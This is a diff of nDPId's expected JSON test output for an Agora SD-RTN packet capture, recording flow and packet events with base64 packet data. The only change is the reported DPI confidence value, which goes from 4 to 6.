00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1649098909724,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649098909724,"pkt":"eJS0JASgYDjgxTWgCABFoAEFGSVAAD8RHDXAqAJkgAHB4NgaH8IA8W8oABnDswAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjQuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAAAqSoMe28oLnTDTmFeZOxmr5z18RrVGKy0+BCCWv+4QUVBRAQAQUVTR1BVQlNBAARSVYAJA6zdDWRpxM9St9qL6qOzgsZyDxIhgwJn+9A1PzyRNecioV1qTytu3xhK7heOGRXDffzXhEsFb1T6Y89aS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":271,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649099059734,"flow_last_seen":1649099059734,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649099059734,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":271,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1649099059734,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649099059734,"pkt":"eJS0JASgYDjgxTWgCABFoAEGCvBAAD8RmZ\/AqAJkF\/i6s9gaH8IA8sWMAKdi5wAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKnA1WVsO9r1ChMt0XY1\/s7+bxVQZKY84CKBGHuirkFFQUQEAEFFU0dQVUJTQQAEwPE37Uh0C9lVLegJsesdDFxpMXWkUMh\/zYukPvJ8bBbb4hy1zyNJBepECcuZCiPlqG+1po4g9g26rcDODuBErktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":271,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649099059734,"flow_last_seen":1649099059734,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649099059734,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":55322,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":271,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649099059734,"flow_last_seen":1649099059734,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649099059734,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":55322,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1649099059734,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649099059734,"pkt":"eJS0JASgYDjgxTWgCABFoAEGCvFAAD8RmZ7AqAJkF\/i6s9gaH8IA8sWMAKdi5wAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKnA1WVsO9r1ChMt0XY1\/s7+bxVQZKY84CKBGHuirkFFQUQEAEFFU0dQVUJTQQAEwPE37Uh0C9lVLegJsesdDFxpMXWkUMh\/zYukPvJ8bBbb4hy1zyNJBepECcuZCiPlqG+1po4g9g26rcDODuBErktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 
00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":3,"flow_last_seen":1649099059734,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649099059734,"pkt":"eJS0JASgYDjgxTWgCABFoAEGCvJAAD8RmZ3AqAJkF\/i6s9gaH8IA8sWMAKdi5wAAIQAAAAAABFNOSQAcADIzLTI0OC0xODYtMTc5LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAAKnA1WVsO9r1ChMt0XY1\/s7+bxVQZKY84CKBGHuirkFFQUQEAEFFU0dQVUJTQQAEwPE37Uh0C9lVLegJsesdDFxpMXWkUMh\/zYukPvJ8bBbb4hy1zyNJBepECcuZCiPlqG+1po4g9g26rcDODuBErktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":286,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098879720,"flow_last_seen":1649098879767,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3117,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1649099059780,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":286,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098849713,"flow_last_seen":1649098849898,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3135,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1649099059780,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":286,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1649098089567,"flow_last_seen":1649098819802,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":944,"flow_tot_l4_payload_len":7165,"flow_avg_l4_payload_len":238,"midstream":0,"thread_ts_msec":1649099059780,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":286,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098879720,"flow_last_seen":1649098879767,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3117,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":1649099059780,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.180","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":286,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098849713,"flow_last_seen":1649098849898,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3135,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1649099059780,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":286,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1649098089567,"flow_last_seen":1649098819802,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":944,"flow_tot_l4_payload_len":7165,"flow_avg_l4_payload_len":238,"midstream":0,"thread_ts_msec":1649099059780,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"104.166.161.75","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00567{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":286,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","packets-captured":286,"packets-processed":285,"total-skipped-flows":0,"total-l4-payload-len":65673,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":18,"total-detection-updates":0,"total-updates":1,"current-active-flows":2,"total-active-flows":18,"total-idle-flows":16,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":112,"global_ts_msec":1649336870173} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":286,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336870173,"flow_last_seen":1649336870173,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649336870173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":286,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1649336870173,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649336870173,"pkt":"eJS0JASgYDjgxTWgCABFoAEFneZAAD8Rl3TAqAJkgAHB37q9H8IA8S9\/AAspDQAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjMuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAABGFQvya+GSZZFzLP9EmcPktq84Ka2wtV92C\/TcDdPQUVBRAQAQUVTR1BVQlNBAASFAA2pu76c15hPua6baGLo0ixMN8vwRYUqc\/ifFG78vI1pPMSohtWw1XeLlA8Q9eztjAFhjuBR3Q4\/us8bcbydS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} -00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":286,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336870173,"flow_last_seen":1649336870173,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649336870173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":47805,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00651{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":286,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336870173,"flow_last_seen":1649336870173,"flow_idle_time":200000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1649336870173,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.223","src_port":47805,"dst_port":8130,"l4_proto":"udp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":287,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1649336870173,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649336870173,"pkt":"eJS0JASgYDjgxTWgCABFoAEFnedAAD8Rl3PAqAJkgAHB37q9H8IA8S9\/AAspDQAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjMuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAABGFQvya+GSZZFzLP9EmcPktq84Ka2wtV92C\/TcDdPQUVBRAQAQUVTR1BVQlNBAASFAA2pu76c15hPua6baGLo0ixMN8vwRYUqc\/ifFG78vI1pPMSohtWw1XeLlA8Q9eztjAFhjuBR3Q4\/us8bcbydS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} 00759{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":288,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1649336870176,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1649336870176,"pkt":"eJS0JASgYDjgxTWgCABFoAEFnehAAD8Rl3LAqAJkgAHB37q9H8IA8S9\/AAspDQAAIQAAAAAABFNOSQAbADEyOC0xLTE5My0yMjMuZWRnZS5hZ29yYS5pb1BETUQAAENQVE+BAE5PTkMgAAABGFQvya+GSZZFzLP9EmcPktq84Ka2wtV92C\/TcDdPQUVBRAQAQUVTR1BVQlNBAASFAA2pu76c15hPua6baGLo0ixMN8vwRYUqc\/ifFG78vI1pPMSohtWw1XeLlA8Q9eztjAFhjuBR3Q4\/us8bcbydS0VYUwQAUDI1NkNDUlQoAP+XwY\/lEZgfcG0Exgi4J5nZFgkMuGiQFhKUln7foXlIqEex7RofPmI="} 
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":301,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336879948,"flow_last_seen":1649336879948,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649336879948,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"202.226.25.166","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":301,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1649336879948,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649336879948,"pkt":"eJS0JASgYDjgxTWgCABFoAEGMi1AAD8RYIXAqAJkyuIZprq9H8IA8k9OANTVMgAAIQAAAAAABFNOSQAcADIwMi0yMjYtMjUtMTY2LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAARheVm\/xGNkXAa1xNZ6cn0qvjdWopEZUUWf8s\/f0iUFFQUQEAEFFU0dQVUJTQQAE+soIXAdiUu8GIwli\/IgUTbAepdduPriQYSEeX7rQ80xwWJSYOHpV9skpNpuh2S8GXC5t77JsflyRwRm0127PPktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336879948,"flow_last_seen":1649336879948,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649336879948,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"202.226.25.166","src_port":47805,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":301,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336879948,"flow_last_seen":1649336879948,"flow_idle_time":200000,"flow_min_l4_payload_len":234,"flow_max_l4_payload_len":234,"flow_tot_l4_payload_len":234,"flow_avg_l4_payload_len":234,"midstream":0,"thread_ts_msec":1649336879948,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"202.226.25.166","src_port":47805,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1649336879948,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649336879948,"pkt":"eJS0JASgYDjgxTWgCABFoAEGMi5AAD8RYITAqAJkyuIZprq9H8IA8k9OANTVMgAAIQAAAAAABFNOSQAcADIwMi0yMjYtMjUtMTY2LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAARheVm\/xGNkXAa1xNZ6cn0qvjdWopEZUUWf8s\/f0iUFFQUQEAEFFU0dQVUJTQQAE+soIXAdiUu8GIwli\/IgUTbAepdduPriQYSEeX7rQ80xwWJSYOHpV9skpNpuh2S8GXC5t77JsflyRwRm0127PPktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} 
00758{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":303,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1649336879948,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":276,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":276,"pkt_l4_len":242,"thread_ts_msec":1649336879948,"pkt":"eJS0JASgYDjgxTWgCABFoAEGMi9AAD8RYIPAqAJkyuIZprq9H8IA8k9OANTVMgAAIQAAAAAABFNOSQAcADIwMi0yMjYtMjUtMTY2LmVkZ2UuYWdvcmEuaW9QRE1EAABDUFRPgQBOT05DIAAAARheVm\/xGNkXAa1xNZ6cn0qvjdWopEZUUWf8s\/f0iUFFQUQEAEFFU0dQVUJTQQAE+soIXAdiUu8GIwli\/IgUTbAepdduPriQYSEeX7rQ80xwWJSYOHpV9skpNpuh2S8GXC5t77JsflyRwRm0127PPktFWFMEAFAyNTZDQ1JUKAD\/l8GP5RGYH3BtBMYIuCeZ2RYJDLhokBYSlJZ+36F5SKhHse0aHz5i"} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":307,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649099059734,"flow_last_seen":1649099059780,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3162,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1649336880100,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":307,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098909723,"flow_last_seen":1649098909909,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3103,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1649336880100,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.224","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":307,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649099059734,"flow_last_seen":1649099059780,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3162,"flow_avg_l4_payload_len":210,"midstream":0,"thread_ts_msec":1649336880100,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"23.248.186.179","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 
+00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":307,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649098909723,"flow_last_seen":1649098909909,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":492,"flow_tot_l4_payload_len":3103,"flow_avg_l4_payload_len":206,"midstream":0,"thread_ts_msec":1649336880100,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"128.1.193.224","src_port":55322,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":316,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336894950,"flow_last_seen":1649336894950,"flow_idle_time":200000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1649336894950,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"103.104.168.244","src_port":47805,"dst_port":8130,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00762{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1649336894950,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":277,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":277,"pkt_l4_len":243,"thread_ts_msec":1649336894950,"pkt":"eJS0JASgYDjgxTWgCABFoAEHIDxAAD8RRqHAqAJkZ2io9Lq9H8IA8xyaAPT7iQAAIQAAAAAABFNOSQAdADEwMy0xMDQtMTY4LTI0NC5lZGdlLmFnb3JhLmlvUERNRAAAQ1BUT4EATk9OQyAAAAEYbST35dCSgu\/oSnUR68F1zmWE4lAIXeVnuX\/spWFBRUFEBABBRVNHUFVCU0EABCxrWMSJi3cMLo\/DcWomBJZiLPz9wNFAvUHb5Ktqfn+HKAOaK2+kuXH+Fid9l8Sz2DtqO3av9OcynM+pLX4g3fFLRVhTBABQMjU2Q0NSVCgA\/5fBj+URmB9wbQTGCLgnmdkWCQy4aJAWEpSWft+heUioR7HtGh8+Yg=="} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336894950,"flow_last_seen":1649336894950,"flow_idle_time":200000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1649336894950,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"103.104.168.244","src_port":47805,"dst_port":8130,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":316,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649336894950,"flow_last_seen":1649336894950,"flow_idle_time":200000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":235,"flow_tot_l4_payload_len":235,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":1649336894950,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"103.104.168.244","src_port":47805,"dst_port":8130,"l4_proto":"udp","ndpi": 
{"confidence": {"6":"DPI"},"proto":"SD-RTN","breed":"Acceptable","category":"Media"}} 00762{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"agora-sd-rtn.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1649336894951,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":277,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":277,"pkt_l4_len":243,"thread_ts_msec":1649336894951,"pkt":"eJS0JASgYDjgxTWgCABFoAEHID1AAD8RRqDAqAJkZ2io9Lq9H8IA8xyaAPT7iQAAIQAAAAAABFNOSQAdADEwMy0xMDQtMTY4LTI0NC5lZGdlLmFnb3JhLmlvUERNRAAAQ1BUT4EATk9OQyAAAAEYbST35dCSgu\/oSnUR68F1zmWE4lAIXeVnuX\/spWFBRUFEBABBRVNHUFVCU0EABCxrWMSJi3cMLo\/DcWomBJZiLPz9wNFAvUHb5Ktqfn+HKAOaK2+kuXH+Fid9l8Sz2DtqO3av9OcynM+pLX4g3fFLRVhTBABQMjU2Q0NSVCgA\/5fBj+URmB9wbQTGCLgnmdkWCQy4aJAWEpSWft+heUioR7HtGh8+Yg=="} 